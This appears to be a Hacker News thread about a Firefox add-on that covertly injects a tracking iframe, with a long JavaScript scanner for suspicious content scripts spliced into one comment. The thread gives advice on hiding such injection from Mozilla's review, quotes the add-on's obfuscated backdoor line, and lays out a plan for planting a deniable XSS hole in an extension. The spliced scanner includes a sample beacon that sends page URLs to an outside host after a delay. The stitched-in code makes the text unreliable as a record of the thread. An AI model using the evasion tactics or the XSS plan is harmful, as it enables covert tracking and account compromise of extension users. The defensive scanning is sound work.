
I can see your local web servers

(http.jameshfisher.com)
652 points jamesfisher | 12 comments
1. megous No.20028564
Another approach is to create a useful extension like:

  https://addons.mozilla.org/en-US/firefox/addon/yt-adblock/reviews/
disguise that you're inserting an iframe linking to your web server into every single page the user opens, by naming variables and your tracking domain incorrectly and by waiting for an hour after installation (this may also help avoid the automatic tests Mozilla is doing), and then just sit back and wait and log all the referers and IP addresses. It's a bit stealthier too, but needs users to visit their local web servers. But you'll also get the full URL.

Nobody will report you or care about the report and users are banned from fixing the extension code locally even if they're able to review it themselves. Bad reviews with some actual text fade away quickly, so if someone warns your other users, it will be pushed out to page 2 after a while by other useful one word or just empty reviews and it will work out.

replies(6): >>20029474 #>>20029949 #>>20029998 #>>20030028 #>>20032054 #>>20034125 #
2. MrGilbert No.20029474
From my experience as a dev (who has already submitted extensions to moz), this will be sorted out. However, it might take up to 4 - 6 weeks, until an actual human being reviews the changes. But it gets reviewed.
replies(1): >>20029807 #
3. megous No.20029807
Last updated "5 months ago (Dec 16, 2018)".

One would hope that reporting an extension would help reviewing it sooner especially if it's 26th top rated one and all that's needed is to verify the claims in the report.

4. kapep No.20029949
Is there any way to get the source code of extensions from the Mozilla web site? I think some years ago you could look at the code in your browser from a link in the version history but I don't see any links at all now.
replies(2): >>20030055 #>>20031791 #
5. modzu No.20029998
what is meant by, "users are banned from fixing the extension code locally"? i download and modify other people's extensions all the time.
replies(1): >>20030370 #
6. farukuzun No.20030028
Very nice catch. I examined it a little bit more. Seems like line 16 in scripts/yts.js is the backdoor.

  enableButton.src = '//remove' + '.' + 'video/webm';
So the owner of this addon has the remove.video domain. On https://remove.video/webm there's packed JavaScript code. When I unpacked it I got this: https://paste.ubuntu.com/p/C24bZc9Cn7/

There's a base64-encoded domain list in the packed JavaScript code. Here's the list of domains: https://paste.ubuntu.com/p/RMKd8Ms5QQ/

7. farukuzun No.20030055
I'm using this extension for it: https://addons.mozilla.org/en-US/firefox/addon/crxviewer/
8. Mathnerd314 No.20030370
Probably the signing requirement for release builds of Firefox.
9. megous No.20031791
Right click the "Add to Firefox" button and use "Save as...". This will get you an xpi file which you can unzip and inspect.

Many addons will use some packing method, bundle all kinds of stuff into their content scripts (jQuery, etc.). It can be hard to review.

Some addons are quite horrifying (you see stuff like `<span ...>${someText}</span>`) (missing escaping, etc.). I'm quite sure there are some content scripts out there that have XSS issues that can be triggered from the page itself. This is great on pages like GitHub, where there are quanta of user-controlled content.

So if you want a suggestion for a clever attack:

1] make an extension for Facebook or Twitter or GitHub that reorganizes the wall somewhat and make a `mistake` like assigning some user-controlled content via innerHTML. This will probably pass review.

2] Suggest your addon to your target.

3] Post your payload as a message/tweet/whatever to your target. Now you have extension assisted XSS.

Pretty easy to add XSS to any page, with plausible deniability.
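
A small triage script, added here as an example and not code from this thread, from the yt-adblock extension, or from Mozilla, that mechanizes the review megous and farukuzun describe once you have the scripts out of the unzipped xpi: it folds split string literals such as `'//remove' + '.' + 'video/webm'` back into the host they hide, decodes long base64 blobs so an encoded domain list becomes readable, flags timers of an hour or more (the wait-after-install trick), flags innerHTML/outerHTML/insertAdjacentHTML sinks fed with interpolated or concatenated data (the "mistake" from the attack sketch), and flags iframe creation. The input is a constructed sample content script modelled on the thread's description, not the real scripts/yts.js; the localhost URLs in its encoded list and the one-hour timer are assumptions chosen so that every check fires.

```javascript
'use strict';

// Hiding tricks from the thread, as regex checks over content-script source.
// Run it over the .js files from an unzipped .xpi; here it runs over a sample.
const HOUR_MS = 60 * 60 * 1000;

// 1-based line number of a character offset in src
function lineOf(src, index) {
  return src.slice(0, index).split('\n').length;
}

// "'//remove' + '.' + 'video/webm'" -> "//remove.video/webm"
// (plain literals only; escape sequences are left as written)
function foldLiteralChain(chain) {
  const parts = [];
  const lit = /'([^']*)'|"([^"]*)"/g;
  let m;
  while ((m = lit.exec(chain)) !== null) parts.push(m[1] !== undefined ? m[1] : m[2]);
  return parts.join('');
}

// "60 * 60 * 1000" -> 3600000 (products of integer literals only)
function evalProduct(expr) {
  return expr.split('*').map((s) => Number(s.trim())).reduce((a, b) => a * b, 1);
}

function scanContentScript(src) {
  const findings = [];
  const add = (kind, index, detail) => findings.push({ kind, line: lineOf(src, index), detail });
  let m;

  // 1. adjacent string literals glued with '+': a grep for the hostname will not see it
  const chain = /(?:'[^'\n]*'|"[^"\n]*")(?:\s*\+\s*(?:'[^'\n]*'|"[^"\n]*"))+/g;
  while ((m = chain.exec(src)) !== null) {
    const folded = foldLiteralChain(m[0]);
    if (/^(?:https?:)?\/\/[\w.-]+\.[a-z]{2,}/i.test(folded)) add('split-url-literal', m.index, folded);
  }

  // 2. long base64 blobs (the thread's encoded domain list), decoded for the reviewer
  const b64 = /['"]([A-Za-z0-9+/]{40,}={0,2})['"]/g;
  while ((m = b64.exec(src)) !== null) {
    const text = Buffer.from(m[1], 'base64').toString('utf8');
    add('base64-blob', m.index, /^[\x20-\x7e\s]+$/.test(text) ? text : '(binary)');
  }

  // 3. a delay of an hour or more before anything runs (outwaits install-time tests).
  //    The lazy match takes the first ", <number>)" after the call, so nested
  //    callbacks with their own numeric second argument can confuse it.
  const timer = /set(?:Timeout|Interval)\s*\([\s\S]*?,\s*(\d+(?:\s*\*\s*\d+)*)\s*\)/g;
  while ((m = timer.exec(src)) !== null) {
    const ms = evalProduct(m[1]);
    if (ms >= HOUR_MS) add('long-delay', m.index, ms + ' ms');
  }
  const alarm = /(?:delay|period)InMinutes\s*:\s*(\d+(?:\s*\*\s*\d+)*)/g;
  while ((m = alarm.exec(src)) !== null) {
    const ms = evalProduct(m[1]) * 60 * 1000;
    if (ms >= HOUR_MS) add('long-delay', m.index, ms + ' ms');
  }

  // 4. HTML sinks fed with interpolated or concatenated data: page content
  //    becomes markup that runs with the content script's privileges
  const sink = /\.(?:innerHTML|outerHTML)\s*=\s*(?:`[^`]*\$\{|[^;\n]*\+)|insertAdjacentHTML\s*\([^,]*,\s*(?:`[^`]*\$\{|[^)]*\+)/g;
  while ((m = sink.exec(src)) !== null) add('html-sink-interpolation', m.index, m[0].trim());

  // 5. iframes created by the script (the beacon from the first comment)
  const iframe = /createElement\s*\(\s*['"]iframe['"]\s*\)/g;
  while ((m = iframe.exec(src)) !== null) add('iframe-injection', m.index, m[0]);

  return findings;
}

// Constructed sample (not the real scripts/yts.js) that combines every trick above.
// The encoded host list and the one-hour timer are assumptions for the demo.
const HIDDEN_LIST = Buffer.from('http://localhost:8080,http://127.0.0.1:3000').toString('base64');
const SAMPLE_CONTENT_SCRIPT = [
  "var enableButton = document.createElement('img');",
  "enableButton.src = '//remove' + '.' + 'video/webm';",
  "var hosts = '" + HIDDEN_LIST + "';",
  'setTimeout(function () {',
  "  var f = document.createElement('iframe');",
  "  f.style.display = 'none';",
  "  f.src = '//remove' + '.' + 'video/p?r=' + location.href;",
  '  document.body.appendChild(f);',
  '}, 60 * 60 * 1000);',
  'function renderTweet(t) {',
  '  box.innerHTML = `<span class="tw">${t.text}</span>`;',
  '}',
].join('\n');

if (typeof require !== 'undefined' && require.main === module) {
  for (const f of scanContentScript(SAMPLE_CONTENT_SCRIPT)) {
    console.log('line ' + f.line + ': ' + f.kind + ': ' + f.detail);
  }
}
```

The findings are a starting point for the manual read, not a verdict: the split-literal and base64 checks show the reviewer what the script actually contacts, the timer check catches the wait-an-hour trick, and the sink check points at the innerHTML assignment that turns page content into extension-assisted XSS. Packed or minified bundles will defeat the literal-folding check, which is exactly why megous notes that such addons are hard to review.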

10. tomc1985 No.20032054
Hopefully that sort of shenanigans would fail AMO code reviews
replies(1): >>20032157 #
11. nothrabannosir No.20032157
This is not a hypothetical but a smoking gun. That plugin really does those things.
12. SmokeGS No.20034125
Nice, this will be fun.